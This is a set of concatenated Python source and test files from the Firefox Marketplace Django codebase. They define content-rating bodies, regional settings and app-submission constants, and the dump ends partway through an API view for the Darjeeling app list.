# RatingInteractives django model in mkt.webapps.models.
RATING_INTERACTIVES = OrderedDict([
('USERS_INTERACT', {
'name': _lazy('Users Interact'),
}),
('SHARES_INFO', {
'name': _lazy('Shares Info'),
}),
('SHARES_LOCATION', {
'name': _lazy('Shares Location'),
}),
('DIGITAL_PURCHASES', {
'name': _lazy('Digital Purchases'),
}),
])
########NEW FILE########
__FILENAME__ = ratingsbodies
# -*- coding: utf-8 -*-
from tower import ugettext_lazy as _lazy
NAME_GENERAL = _lazy('For all ages')
# L10n: %d is the age in years. For ages %d and higher.
NAME_LAZY = _lazy('For ages %d+') # Fill this in after accessing.
NAME_REJECTED = _lazy(u'Rating Rejected')
NAME_PENDING = _lazy(u'Rating Pending')
class RATING(object):
"""
Content rating.
iarc_name -- how IARC names the rating, to talk with IARC.
age -- minimum age of the rating's age recommendation.
name -- how we name the rating, for translated display on all pages.
label -- for CSS classes, to create icons.
"""
age = None
name = None
label = None
adult = False
class RATING_BODY(object):
"""
Content rating body.
iarc_name -- how IARC names the ratings body, to talk with IARC.
ratings -- list of RATINGs associated with this body.
name -- for general translated display on all pages.
label -- for CSS classes, to create icons.
description -- for general translated display on all pages.
full_name -- in case we ever want to display the full translated name.
url -- in case we ever want to link to the ratings body page for more info.
"""
label = None
class CLASSIND_L(RATING):
id = 0
age = 0
iarc_name = '0+'
class CLASSIND_10(RATING):
id = 1
age = 10
iarc_name = '10+'
class CLASSIND_12(RATING):
id = 2
age = 12
iarc_name = '12+'
class CLASSIND_14(RATING):
id = 3
age = 14
iarc_name = '14+'
class CLASSIND_16(RATING):
id = 4
age = 16
iarc_name = '16+'
class CLASSIND_18(RATING):
id = 5
age = 18
iarc_name = '18+'
adult = True
class CLASSIND(RATING_BODY):
"""
The Brazilian game ratings body (aka. DEJUS, DJCTQ).
"""
id = 0
iarc_name = 'CLASSIND'
ratings = (CLASSIND_L, CLASSIND_10, CLASSIND_12, CLASSIND_14, CLASSIND_16,
CLASSIND_18)
name = 'CLASSIND'
description = _lazy(u'Brazil')
full_name = _lazy(u'Department of Justice, Rating, Titles and '
u'Qualification')
url = ('http://portal.mj.gov.br/classificacao/data/Pages/'
'MJ6BC270E8PTBRNN.htm')
class GENERIC_3(RATING):
id = 0
age = 3
iarc_name = '3+'
class GENERIC_7(RATING):
id = 1
age = 7
iarc_name = '7+'
class GENERIC_12(RATING):
id = 2
age = 12
iarc_name = '12+'
class GENERIC_16(RATING):
id = 3
age = 16
iarc_name = '16+'
class GENERIC_18(RATING):
id = 4
age = 18
iarc_name = '18+'
adult = True
class GENERIC_RP(RATING):
id = 5
iarc_name = 'RP'
label = 'pending'
name = NAME_PENDING
class GENERIC(RATING_BODY):
"""
The generic game ratings body (used in Germany, for example).
"""
id = 1
iarc_name = 'Generic'
ratings = (GENERIC_3, GENERIC_7, GENERIC_12, GENERIC_16, GENERIC_18,
GENERIC_RP)
name = _lazy('Generic')
description = '' # No comment.
full_name = _lazy(u'Generic')
class USK_0(RATING):
id = 0
age = 0
iarc_name = '0+'
class USK_6(RATING):
id = 1
age = 6
iarc_name = '6+'
class USK_12(RATING):
id = 2
age = 12
iarc_name = '12+'
class USK_16(RATING):
id = 3
age = 16
iarc_name = '16+'
class USK_18(RATING):
id = 4
age = 18
iarc_name = '18+'
adult = True
class USK_REJECTED(RATING):
id = 5
iarc_name = 'Rating Refused'
label = 'rating-refused'
name = NAME_REJECTED
class USK(RATING_BODY):
"""
The organization responsible for game ratings in Germany
(aka. Unterhaltungssoftware Selbstkontrolle).
"""
id = 2
iarc_name = 'USK'
ratings = (USK_0, USK_6, USK_12, USK_16, USK_18, USK_REJECTED)
name = 'USK'
description = _lazy(u'Germany')
full_name = _lazy(u'Entertainment Software Self-Regulation Body')
url = 'http://www.usk.de/en/'
class ESRB_E(RATING):
"""Everybody."""
id = 0
age = 0
iarc_name = 'Everyone'
name = _lazy('Everyone')
class ESRB_10(RATING):
id = 1
age = 10
iarc_name = 'Everyone 10+'
name = _lazy('Everyone 10+') # L10n: `10+` is age ten and over.
class ESRB_T(RATING):
id = 2
age = 13
iarc_name = 'Teen'
name = _lazy('Teen')
class ESRB_M(RATING):
id = 3
age = 17
iarc_name = 'Mature 17+'
name = _lazy('Mature 17+') # L10n: `17+` is age seventeen and over.
class ESRB_A(RATING):
id = 4
age = 18
iarc_name = 'Adults Only'
name = _lazy('Adults Only 18+') # L10n: `18+` is age eighteen and over.
adult = True
class ESRB(RATING_BODY):
"""
The North American game ratings body (i.e. USA, Canada).
"""
id = 3
iarc_name = 'ESRB'
ratings = (ESRB_E, ESRB_10, ESRB_T, ESRB_M, ESRB_A)
name = 'ESRB'
# L10n: North and South American, but not Brazil.
description = _lazy(u'All Americas except Brazil')
full_name = _lazy(u'Entertainment Software Rating Board')
url = 'http://esrb.org'
class PEGI_3(RATING):
id = 0
age = 3
iarc_name = '3+'
class PEGI_7(RATING):
id = 1
age = 7
iarc_name = '7+'
class PEGI_12(RATING):
id = 2
age = 12
iarc_name = '12+'
class PEGI_16(RATING):
id = 3
age = 16
iarc_name = '16+'
class PEGI_18(RATING):
id = 4
age = 18
iarc_name = '18+'
adult = True
class PEGI(RATING_BODY):
"""
The European game ratings body (i.e. UK, Poland, Spain).
"""
id = 4
iarc_name = 'PEGI'
ratings = (PEGI_3, PEGI_7, PEGI_12, PEGI_16, PEGI_18)
name = 'PEGI'
description = _lazy(u'Europe')
full_name = _lazy(u'Pan European Game Information')
url = 'http://www.pegi.info'
RATINGS_BODIES = {
CLASSIND.id: CLASSIND,
GENERIC.id: GENERIC,
USK.id: USK,
ESRB.id: ESRB,
PEGI.id: PEGI,
}
# Attach ratings bodies to ratings.
for rb in RATINGS_BODIES.values():
for r in rb.ratings:
r.ratingsbody = rb
ALL_RATINGS_BODIES = [CLASSIND, GENERIC, USK, ESRB, PEGI]
def ALL_RATINGS():
"""
List of all ratings with waffled bodies.
"""
import waffle
ALL_RATINGS = []
for rb in RATINGS_BODIES.values():
if rb in (CLASSIND, GENERIC) or waffle.switch_is_active('iarc'):
ALL_RATINGS.extend(rb.ratings)
return ALL_RATINGS
def RATINGS_BY_NAME():
"""
Create a list of tuples (choices) after we know the locale since this
attempts to concatenate two lazy translations in constants file.
"""
import waffle
all_ratings = ALL_RATINGS()
ratings_choices = []
for rb in RATINGS_BODIES.values():
if rb in (CLASSIND, GENERIC) or waffle.switch_is_active('iarc'):
for r in rb.ratings:
ratings_choices.append(
(all_ratings.index(r),
u'%s - %s' % (rb.name, dehydrate_rating(r).name)))
return ratings_choices
def slugify_iarc_name(obj):
"""
Converts ratings body's or rating's iarc_name to a slug-like label
(e.g. "USK" to "usk").
"""
return obj.iarc_name.lower().replace(' ', '-')
def dehydrate_rating(rating_class):
"""
Returns a rating with translated fields attached and with fields that are
easily created dynamically.
"""
rating = rating_class()
if rating.label is None:
rating.label = str(rating.age) or slugify_iarc_name(rating)
if rating.name is None:
if rating.age == 0:
rating.name = unicode(NAME_GENERAL)
else:
rating.name = unicode(NAME_LAZY) % rating.age
rating.name = unicode(rating.name)
return rating
def dehydrate_ratings_body(body_class):
"""Returns a rating body with translated fields attached."""
body = body_class()
if body.label is None:
body.label = slugify_iarc_name(body)
body.name = unicode(body.name)
body.description = unicode(body.description)
return body
def pth(path):
"""Prepends root icon path to path."""
return 'img/icons/ratings/' + path
IARC_ICONS = {
'ratings': {
# The keys are ratings' labels.
'classind': {
'0': pth('CLASSIND_L.png'),
'10': pth('CLASSIND_10.png'),
'12': pth('CLASSIND_12.png'),
'14': pth('CLASSIND_14.png'),
'16': pth('CLASSIND_16.png'),
'18': pth('CLASSIND_18.png'),
},
'esrb': {
'0': pth('ESRB_e.png'),
'10': pth('ESRB_e10.png'),
'13': pth('ESRB_t.png'),
'17': pth('ESRB_m.png'),
'18': pth('ESRB_ao.png'),
},
'generic': {
'3': pth('generic_3.png'),
'7': pth('generic_7.png'),
'12': pth('generic_12.png'),
'16': pth('generic_16.png'),
'18': pth('generic_18.png'),
'pending': pth('generic_rp.png'),
},
'pegi': {
'3': pth('pegi_3.png'),
'7': pth('pegi_7.png'),
'12': pth('pegi_12.png'),
'16': pth('pegi_16.png'),
'18': pth('pegi_18.png'),
},
'usk': {
'0': pth('USK_0.png'),
'6': pth('USK_6.png'),
'12': pth('USK_12.png'),
'16': pth('USK_16.png'),
'18': pth('USK_18.png'),
'rating-refused': pth('USK_RR.png')
}
},
'descriptors': {
# The keys are descriptors' keys lower-cased and 's/_/-/g'.
'pegi': {
'discrimination': pth('descriptors/pegi_discrimination.png'),
'drugs': pth('descriptors/pegi_drugs.png'),
'gambling': pth('descriptors/pegi_gambling.png'),
'lang': pth('descriptors/pegi_language.png'),
'nudity': pth('descriptors/pegi_nudity.png'),
'online': pth('descriptors/pegi_online.png'),
'scary': pth('descriptors/pegi_fear.png'),
'sex-content': pth('descriptors/pegi_sex.png'),
'violence': pth('descriptors/pegi_violence.png'),
'digital-purchases': pth(
'descriptors/pegi_inapp_purchase_option.png'),
'shares-info': pth(
'descriptors/pegi_personal_data_sharing.png'),
'shares-location': pth(
'descriptors/pegi_location_data_sharing.png'),
'users-interact': pth(
'descriptors/pegi_social_interaction_functionality.png'),
}
},
'interactive_elements': {
# The keys are interactives' keys lower-cased and 's/_/-/g'.
'shares-info': pth('interactives/ESRB_shares-info_small.png'),
'shares-location': pth('interactives/ESRB_shares-location_small.png'),
'users-interact': pth('interactives/ESRB_users-interact_small.png'),
'digital-purchases': pth(
'interactives/ESRB_digital-purchases_small.png'),
}
}
########NEW FILE########
__FILENAME__ = regions
import inspect
import sys
from tower import ugettext_lazy as _lazy
from mkt.constants import ratingsbodies
from mkt.constants.ratingsbodies import slugify_iarc_name
class REGION(object):
"""
A region is like a country but more confusing.
id::
The primary key used to identify a region in the DB.
name::
The text that appears in the header and region selector menu.
slug::
The text that gets stored in the cookie or in ?region=<slug>.
Use the ISO-3166 code please.
mcc::
Don't know what an ITU MCC is? They're useful for carrier billing.
Read http://en.wikipedia.org/wiki/List_of_mobile_country_codes
adolescent::
With a mature region (meaning, it has a volume of useful data) we
are able to calculate ratings and rankings independently. If a
store is immature it will continue using the global popularity
measure. If a store is mature it will use the smaller, more
relevant set of data.
weight::
Determines sort order (after slug).
special::
Does this region need to be reviewed separately? That region is
special.
"""
id = None
name = slug = ''
default_currency = 'USD'
default_language = 'en-US'
adolescent = True
mcc = None
weight = 0
ratingsbody = None
special = False
class RESTOFWORLD(REGION):
id = 1
name = _lazy(u'Rest of World')
slug = 'restofworld'
weight = -1
class US(REGION):
id = 2
name = _lazy(u'United States')
slug = 'us'
mcc = 310
weight = 1
ratingsbody = ratingsbodies.ESRB
class UK(REGION):
id = 4
name = _lazy(u'United Kingdom')
slug = 'uk'
default_currency = 'GBP'
mcc = 235
ratingsbody = ratingsbodies.PEGI
class BR(REGION):
id = 7
name = _lazy(u'Brazil')
slug = 'br'
default_currency = 'BRL'
default_language = 'pt-BR'
mcc = 724
ratingsbody = ratingsbodies.CLASSIND
adolescent = False
class SPAIN(REGION):
id = 8
name = _lazy(u'Spain')
slug = 'es'
default_currency = 'EUR'
default_language = 'es'
mcc = 214
ratingsbody = ratingsbodies.PEGI
class CO(REGION):
id = 9
name = _lazy(u'Colombia')
slug = 'co'
default_currency = 'COP'
default_language = 'es'
mcc = 732
ratingsbody = ratingsbodies.ESRB
adolescent = False
class VE(REGION):
id = 10
name = _lazy(u'Venezuela')
slug = 've'
default_currency = 'USD'
default_language = 'es'
mcc = 734
ratingsbody = ratingsbodies.ESRB
class PL(REGION):
id = 11
name = _lazy(u'Poland')
slug = 'pl'
default_currency = 'PLN'
default_language = 'pl'
mcc = 260
ratingsbody = ratingsbodies.PEGI
class MX(REGION):
id = 12
name = _lazy(u'Mexico')
slug = 'mx'
default_currency = 'MXN'
default_language = 'es'
mcc = 334
ratingsbody = ratingsbodies.ESRB
adolescent = False
class HU(REGION):
id = 13
name = _lazy(u'Hungary')
slug = 'hu'
default_currency = 'HUF'
default_language = 'hu'
mcc = 216
ratingsbody = ratingsbodies.PEGI
class DE(REGION):
id = 14
name = _lazy(u'Germany')
slug = 'de'
default_currency = 'EUR'
default_language = 'de'
mcc = 262
ratingsbody = ratingsbodies.USK
class ME(REGION):
id = 15
name = _lazy(u'Montenegro')
slug = 'me'
default_currency = 'EUR'
default_language = 'srp'
mcc = 297
class RS(REGION):
id = 16
name = _lazy(u'Serbia')
slug = 'rs'
default_currency = 'RSD'
default_language = 'sr'
mcc = 220
class GR(REGION):
id = 17
name = _lazy(u'Greece')
slug = 'gr'
default_currency = 'EUR'
default_language = 'el'
mcc = 202
ratingsbody = ratingsbodies.PEGI
class PE(REGION):
id = 18
name = _lazy(u'Peru')
slug = 'pe'
default_currency = 'PEN'
default_language = 'es'
mcc = 716
ratingsbody = ratingsbodies.ESRB
class UY(REGION):
id = 19
name = _lazy(u'Uruguay')
slug = 'uy'
default_currency = 'UYU'
default_language = 'es'
mcc = 748
ratingsbody = ratingsbodies.ESRB
class AR(REGION):
id = 20
name = _lazy(u'Argentina')
slug = 'ar'
default_currency = 'ARS'
default_language = 'es'
mcc = 722
ratingsbody = ratingsbodies.ESRB
class CN(REGION):
id = 21
name = _lazy(u'China')
slug = 'cn'
default_currency = 'RMB'
default_language = 'zh-CN'
mcc = 460
special = True
class IT(REGION):
id = 22
name = _lazy(u'Italy')
slug = 'it'
default_currency = 'EUR'
default_language = 'it'
mcc = 222
ratingsbody = ratingsbodies.PEGI
class CL(REGION):
id = 23
name = _lazy(u'Chile')
slug = 'cl'
default_currency = 'CLP'
default_language = 'es'
mcc = 730
ratingsbody = ratingsbodies.ESRB
class SV(REGION):
id = 24
name = _lazy(u'El Salvador')
slug = 'sv'
default_currency = 'USD'
default_language = 'es'
mcc = 706
ratingsbody = ratingsbodies.ESRB
class GT(REGION):
id = 25
name = _lazy(u'Guatemala')
slug = 'gt'
default_currency = 'GTQ'
default_language = 'es'
mcc = 704
ratingsbody = ratingsbodies.ESRB
class EC(REGION):
id = 26
name = _lazy(u'Ecuador')
slug = 'ec'
default_currency = 'USD'
default_language = 'es'
mcc = 740
ratingsbody = ratingsbodies.ESRB
class CR(REGION):
id = 27
name = _lazy(u'Costa Rica')
slug = 'cr'
default_currency = 'CRC'
default_language = 'es'
mcc = 712
ratingsbody = ratingsbodies.ESRB
class PA(REGION):
id = 28
name = _lazy(u'Panama')
slug = 'pa'
default_currency = 'USD'
default_language = 'es'
mcc = 714
ratingsbody = ratingsbodies.ESRB
class NI(REGION):
id = 29
name = _lazy(u'Nicaragua')
slug = 'ni'
default_currency = 'NIO'
default_language = 'es'
mcc = 710
ratingsbody = ratingsbodies.ESRB
# Create a list of tuples like so (in alphabetical order):
#
# [('restofworld', <class 'mkt.constants.regions.RESTOFWORLD'>),
# ('brazil', <class 'mkt.constants.regions.BR'>),
# ('usa', <class 'mkt.constants.regions.US'>)]
#
DEFINED = sorted(inspect.getmembers(sys.modules[__name__], inspect.isclass),
key=lambda x: getattr(x, 'slug', None))
REGIONS_CHOICES = (
[('restofworld', RESTOFWORLD)] +
sorted([(v.slug, v) for k, v in DEFINED if v.id and v.weight > -1],
key=lambda x: x[1].weight, reverse=True)
)
BY_SLUG = sorted([v for k, v in DEFINED if v.id and v.weight > -1],
key=lambda v: v.slug)
REGIONS_CHOICES_SLUG = ([('restofworld', RESTOFWORLD)] +
[(v.slug, v) for v in BY_SLUG])
REGIONS_CHOICES_ID = ([(RESTOFWORLD.id, RESTOFWORLD)] +
[(v.id, v) for v in BY_SLUG])
# Rest of World last here so we can display it after all the other regions.
REGIONS_CHOICES_NAME = ([(v.id, v.name) for v in BY_SLUG] +
[(RESTOFWORLD.id, RESTOFWORLD.name)])
REGIONS_DICT = dict(REGIONS_CHOICES)
REGIONS_CHOICES_ID_DICT = dict(REGIONS_CHOICES_ID)
# Provide a dict for looking up the region by slug that includes aliases:
# - "worldwide" is an alias for RESTOFWORLD (bug 940561).
# - "gb" is an alias for UK (bug 973883).
REGION_LOOKUP = dict(REGIONS_DICT.items() +
[('worldwide', RESTOFWORLD), ('gb', UK)])
ALL_REGIONS = frozenset(REGIONS_DICT.values())
ALL_REGION_IDS = sorted(REGIONS_CHOICES_ID_DICT.keys())
SPECIAL_REGIONS = [x for x in BY_SLUG if x.special]
SPECIAL_REGION_IDS = sorted(x.id for x in SPECIAL_REGIONS)
# Regions not including restofworld.
REGION_IDS = sorted(REGIONS_CHOICES_ID_DICT.keys())[1:]
GENERIC_RATING_REGION_SLUG = 'generic'
def ALL_REGIONS_WITH_CONTENT_RATINGS():
"""Regions that have ratings bodies."""
import waffle
if waffle.switch_is_active('iarc'):
return [x for x in ALL_REGIONS if x.ratingsbody]
# Only require content ratings in Brazil/Germany without IARC switch.
return [BR, DE]
def ALL_REGIONS_WITHOUT_CONTENT_RATINGS():
"""
Regions without ratings bodies and fallback to the GENERIC rating body.
"""
return set(ALL_REGIONS) - set(ALL_REGIONS_WITH_CONTENT_RATINGS())
def REGION_TO_RATINGS_BODY():
"""
Return a map of region slugs to ratings body labels for use in
serializers and to send to Fireplace.
e.g. {'us': 'esrb', 'mx': 'esrb', 'es': 'pegi', 'br': 'classind'}.
"""
import waffle
# Create the mapping.
region_to_bodies = {}
for region in ALL_REGIONS_WITH_CONTENT_RATINGS():
ratings_body_label = GENERIC_RATING_REGION_SLUG
if region.ratingsbody:
ratings_body_label = slugify_iarc_name(region.ratingsbody)
region_to_bodies[region.slug] = ratings_body_label
# Resolve edge cases related to switches.
if not waffle.switch_is_active('iarc'):
region_to_bodies.update({
'de': GENERIC_RATING_REGION_SLUG
})
return region_to_bodies
def REGIONS_CHOICES_SORTED_BY_NAME():
"""Get the region choices and sort by name.
Requires a function due to localisation.
"""
# Avoid circular import.
from mkt.regions.utils import remove_accents
by_name = sorted([v for k, v in DEFINED if v.id and v.weight > -1],
key=lambda v: remove_accents(unicode(v.name)))
return ([(v.id, v.name) for v in by_name] +
[(RESTOFWORLD.id, RESTOFWORLD.name)])
########NEW FILE########
__FILENAME__ = reviewers
from tower import ugettext_lazy as _
# App type for reviewer app queue filters.
APP_TYPE_HOSTED = 0
APP_TYPE_PACKAGED = 1
APP_TYPES = {
APP_TYPE_HOSTED: _('Hosted'),
APP_TYPE_PACKAGED: _('Packaged')
}
########NEW FILE########
__FILENAME__ = submit
from tower import ugettext_lazy as _
APP_STEPS = [
('terms', _('Agreement')),
('manifest', _('Submit')),
('details', _('Details')),
('done', _('Done!')),
# ('next_steps', _('Next Steps')),
]
APP_STEPS_TITLE = dict(APP_STEPS)
# Preview sizes in the format (width, height, type)
APP_PREVIEW_MINIMUMS = (320, 480)
APP_PREVIEW_SIZES = [
(100, 150, 'mobile'), # Thumbnail size.
(700, 1050, 'full'), # Because it's proportional, that's why.
]
MAX_PACKAGED_APP_SIZE = 100 * 1024 * 1024 # 100MB
########NEW FILE########
__FILENAME__ = test_features
import itertools
from ordereddict import OrderedDict
from django.conf import settings
import mock
from nose.tools import eq_, ok_
import amo.tests
from mkt.constants.features import APP_FEATURES, FeatureProfile
APP_FEATURES = OrderedDict(itertools.islice(APP_FEATURES.iteritems(), 45))
@mock.patch('mkt.constants.features.APP_FEATURES', APP_FEATURES)
class TestFeatureProfile(amo.tests.TestCase):
def setUp(self):
self.features = 0x110022000000
self.signature = '110022000000.45.%s' % settings.APP_FEATURES_VERSION
self.truths = ['apps', 'proximity', 'light_events', 'vibrate']
def test_init(self):
profile = FeatureProfile(**dict((f, True) for f in self.truths))
eq_(profile.to_signature(), self.signature)
eq_(profile.to_int(), self.features)
def _test_profile(self, profile):
eq_(profile.to_int(), self.features)
eq_(profile.to_signature(), self.signature)
for k, v in profile.iteritems():
if v:
ok_(k in self.truths, '%s not in truths' % k)
else:
ok_(k not in self.truths, '%s is in truths' % k)
def test_from_int(self):
profile = FeatureProfile.from_int(self.features)
self._test_profile(profile)
def test_from_int_all_false(self):
self.features = 0
self.signature = '0.45.%s' % settings.APP_FEATURES_VERSION
self.truths = []
self.test_from_int()
def test_from_signature(self):
profile = FeatureProfile.from_signature(self.signature)
self._test_profile(profile)
def _test_kwargs(self, prefix):
profile = FeatureProfile.from_int(self.features)
kwargs = profile.to_kwargs(prefix=prefix)
ok_(all([k.startswith(prefix) for k in kwargs.keys()]))
eq_(kwargs.values().count(False), bin(self.features)[2:].count('0'))
eq_(len(kwargs.values()), len(APP_FEATURES) - len(self.truths))
def test_to_kwargs(self):
self._test_kwargs('')
self._test_kwargs('prefix_')
########NEW FILE########
__FILENAME__ = test_platforms
from django.test.client import RequestFactory
from nose.tools import eq_
from tower import ugettext as _
import amo.tests
from mkt.constants.platforms import FREE_PLATFORMS, PAID_PLATFORMS
class TestPlatforms(amo.tests.TestCase):
def test_free_platforms_default(self):
platforms = FREE_PLATFORMS()
expected = (
('free-firefoxos', _('Firefox OS')),
('free-desktop', _('Firefox for Desktop')),
('free-android-mobile', _('Firefox Mobile')),
('free-android-tablet', _('Firefox Tablet')),
)
eq_(platforms, expected)
def test_free_platforms_pkg_waffle_off(self):
platforms = FREE_PLATFORMS(request=RequestFactory(),
is_packaged=True)
expected = (
('free-firefoxos', _('Firefox OS')),
)
eq_(platforms, expected)
def test_free_platforms_pkg_desktop_waffle_on(self):
self.create_flag('desktop-packaged')
platforms = FREE_PLATFORMS(request=RequestFactory(),
is_packaged=True)
expected = (
('free-firefoxos', _('Firefox OS')),
('free-desktop', _('Firefox for Desktop')),
)
eq_(platforms, expected)
def test_free_platforms_pkg_android_waffle_on(self):
self.create_flag('android-packaged')
platforms = FREE_PLATFORMS(request=RequestFactory(),
is_packaged=True)
expected = (
('free-firefoxos', _('Firefox OS')),
('free-android-mobile', _('Firefox Mobile')),
('free-android-tablet', _('Firefox Tablet')),
)
eq_(platforms, expected)
def test_free_platforms_pkg_android_and_desktop_waffle_on(self):
self.create_flag('android-packaged')
self.create_flag('desktop-packaged')
platforms = FREE_PLATFORMS(request=RequestFactory(),
is_packaged=True)
expected = (
('free-firefoxos', _('Firefox OS')),
('free-desktop', _('Firefox for Desktop')),
('free-android-mobile', _('Firefox Mobile')),
('free-android-tablet', _('Firefox Tablet')),
)
eq_(platforms, expected)
def test_paid_platforms_default(self):
platforms = PAID_PLATFORMS()
expected = (
('paid-firefoxos', _('Firefox OS')),
)
eq_(platforms, expected)
def test_paid_platforms_android_payments_waffle_on(self):
self.create_flag('android-payments')
platforms = PAID_PLATFORMS(request=RequestFactory())
expected = (
('paid-firefoxos', _('Firefox OS')),
('paid-android-mobile', _('Firefox Mobile')),
('paid-android-tablet', _('Firefox Tablet')),
)
eq_(platforms, expected)
def test_paid_platforms_pkg_with_android_payments_waffle_on(self):
self.create_flag('android-payments')
platforms = PAID_PLATFORMS(request=RequestFactory(),
is_packaged=True)
expected = (
('paid-firefoxos', _('Firefox OS')),
)
eq_(platforms, expected)
def test_paid_platforms_pkg_with_android_payment_pkg_waffle_on(self):
self.create_flag('android-payments')
self.create_flag('android-packaged')
platforms = PAID_PLATFORMS(request=RequestFactory(),
is_packaged=True)
expected = (
('paid-firefoxos', _('Firefox OS')),
('paid-android-mobile', _('Firefox Mobile')),
('paid-android-tablet', _('Firefox Tablet')),
)
eq_(platforms, expected)
########NEW FILE########
__FILENAME__ = test_ratingsbodies
from contextlib import contextmanager
from nose.tools import eq_
from tower import activate
import amo.tests
import mkt.constants.ratingsbodies as ratingsbodies
class TestRatingsBodies(amo.tests.TestCase):
def test_all_ratings_waffle_off(self):
ratings = ratingsbodies.ALL_RATINGS()
# Assert only CLASSIND and GENERIC ratings are present.
assert ratingsbodies.CLASSIND_L in ratings
assert ratingsbodies.GENERIC_3 in ratings
assert ratingsbodies.ESRB_E not in ratings
assert ratingsbodies.PEGI_3 not in ratings
assert ratingsbodies.USK_0 not in ratings
def test_all_ratings_waffle_on(self):
self.create_switch('iarc')
ratings = ratingsbodies.ALL_RATINGS()
# Assert all ratings bodies are present.
assert ratingsbodies.CLASSIND_L in ratings
assert ratingsbodies.GENERIC_3 in ratings
assert ratingsbodies.ESRB_E in ratings
assert ratingsbodies.PEGI_3 in ratings
assert ratingsbodies.USK_0 in ratings
def test_ratings_by_name_waffle(self):
without_waffle = ratingsbodies.RATINGS_BY_NAME()
self.create_switch('iarc', db=True)
with_waffle = ratingsbodies.RATINGS_BY_NAME()
# Test waffle off excludes ratings.
assert len(without_waffle) < len(with_waffle)
def test_ratings_by_name_lazy_translation(self):
generic_3_choice = ratingsbodies.RATINGS_BY_NAME()[6]
eq_(generic_3_choice[1], 'Generic - For ages 3+')
def test_ratings_has_ratingsbody(self):
eq_(ratingsbodies.GENERIC_3.ratingsbody, ratingsbodies.GENERIC)
eq_(ratingsbodies.CLASSIND_L.ratingsbody, ratingsbodies.CLASSIND)
eq_(ratingsbodies.ESRB_E.ratingsbody, ratingsbodies.ESRB)
eq_(ratingsbodies.USK_0.ratingsbody, ratingsbodies.USK)
eq_(ratingsbodies.PEGI_3.ratingsbody, ratingsbodies.PEGI)
def test_dehydrate_rating(self):
self.create_switch('iarc')
for rating in ratingsbodies.ALL_RATINGS():
rating = ratingsbodies.dehydrate_rating(rating)
assert isinstance(rating.name, unicode), rating
assert rating.label and rating.label != str(None), rating
def test_dehydrate_ratings_body(self):
self.create_switch('iarc')
for k, body in ratingsbodies.RATINGS_BODIES.iteritems():
body = ratingsbodies.dehydrate_ratings_body(body)
assert isinstance(body.name, unicode)
assert body.label and body.label != str(None)
assert isinstance(body.description, unicode)
@contextmanager
def tower_activate(self, region):
try:
activate(region)
yield
finally:
activate('en-US')
def test_dehydrate_rating_language(self):
self.create_switch('iarc')
with self.tower_activate('es'):
rating = ratingsbodies.dehydrate_rating(ratingsbodies.ESRB_T)
eq_(rating.name, 'Adolescente')
with self.tower_activate('fr'):
rating = ratingsbodies.dehydrate_rating(ratingsbodies.ESRB_T)
eq_(rating.name, 'Adolescents')
rating = ratingsbodies.dehydrate_rating(ratingsbodies.ESRB_T)
eq_(rating.name, 'Teen')
########NEW FILE########
__FILENAME__ = test_regions
from contextlib import contextmanager
from django.utils import translation
from nose.tools import eq_, ok_
from tower import activate
import amo.tests
import mkt.constants.regions as regions
class TestRegionContentRatings(amo.tests.TestCase):
@contextmanager
def tower_activate(self, region):
try:
activate(region)
yield
finally:
activate('en-US')
def test_region_to_ratings_body(self):
region_to_body = regions.REGION_TO_RATINGS_BODY()
eq_(len(region_to_body), 2)
eq_(region_to_body['br'], 'classind')
eq_(region_to_body['de'], 'generic')
def test_region_to_ratings_body_switch(self):
self.create_switch('iarc')
region_to_body = regions.REGION_TO_RATINGS_BODY()
eq_(region_to_body['br'], 'classind')
eq_(region_to_body['es'], 'pegi')
eq_(region_to_body['de'], 'usk')
eq_(region_to_body['us'], 'esrb')
def test_name_sorted_regions_eq_slug_sorted_regions(self):
"""Check data is the same, irrespective of ordering."""
self.assertEqual(len(regions.REGIONS_CHOICES_NAME),
len(regions.REGIONS_CHOICES_SORTED_BY_NAME()))
self.assertSetEqual(regions.REGIONS_CHOICES_NAME,
regions.REGIONS_CHOICES_SORTED_BY_NAME())
def test_rest_of_world_last_regions_by_slug(self):
eq_(regions.REGIONS_CHOICES_NAME[-1][1], regions.RESTOFWORLD.name)
def test_rest_of_world_last_regions_by_name(self):
eq_(regions.REGIONS_CHOICES_SORTED_BY_NAME()[-1][1],
regions.RESTOFWORLD.name)
def test_localized_sorting_of_region_choices_pl(self):
with self.tower_activate('pl'):
region_names_pl = [r[1] for r in
regions.REGIONS_CHOICES_SORTED_BY_NAME()]
ok_(region_names_pl.index(regions.SPAIN.name) <
region_names_pl.index(regions.UK.name))
ok_(region_names_pl.index(regions.UK.name) >
region_names_pl.index(regions.US.name))
def test_localized_sorting_of_region_choices_fr(self):
with self.tower_activate('fr'):
region_names_fr = [unicode(r[1]) for r in
regions.REGIONS_CHOICES_SORTED_BY_NAME()]
ok_(region_names_fr.index(regions.SPAIN.name) <
region_names_fr.index(regions.US.name))
ok_(region_names_fr.index(regions.US.name) <
region_names_fr.index(regions.UK.name))
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from mkt.darjeeling.views import DarjeelingAppList
urlpatterns = patterns('',
url(r'^darjeeling/list/',
DarjeelingAppList.as_view(),
name='darjeeling-list'),
)
########NEW FILE########
__FILENAME__ = views
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
from rest_framework.serializers import SerializerMethodField
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.collections.models import Collection
from mkt.fireplace.serializers import (FireplaceCollectionMembershipField,
FireplaceESAppSerializer)
class FakeCollection(object):
def __init__(self, pk):
self.pk = pk
class DarjeelingESAppSerializer(FireplaceESAppSerializer):
featured = SerializerMethodField('is_featured')
class Meta(FireplaceESAppSerializer.Meta):
fields = sorted(FireplaceESAppSerializer.Meta.fields + ['featured'])
exclude = FireplaceESAppSerializer.Meta.exclude
def is_featured(self, obj):
collections = [c['id'] for c in obj.es_data.get('collection', [])]
return self.context['featured_pk'] in collections
class DarjeelingCollectionMembershipField(FireplaceCollectionMembershipField):
app_serializer_classes = {
'es': DarjeelingESAppSerializer,
}
class DarjeelingAppList(CORSMixin, MarketplaceView, ListAPIView):
"""
Endpoint that darjeeling client consumes to fetch its app list. The list is
actually made of 2 things:
- One collection called "darjeeling-apps" containg all apps;
- One collection called "darjeeling-featured" containing all homepage apps.
The first list is returned directly (without pagination) and since the
second one is just supposed to be a subset of the first, only the app ids
are returned.
"""
cors_allowed_methods = ['get']
authentication_classes = []
permission_classes = []
def get_collection(self, slug):
"""
Return a Fake Collection object with only the pk, for use with
CollectionMembershipField. We can't simply do a Collection.objects.only
query, because transforms get in the way (no_transforms doesn't remove
translations atm)
"""
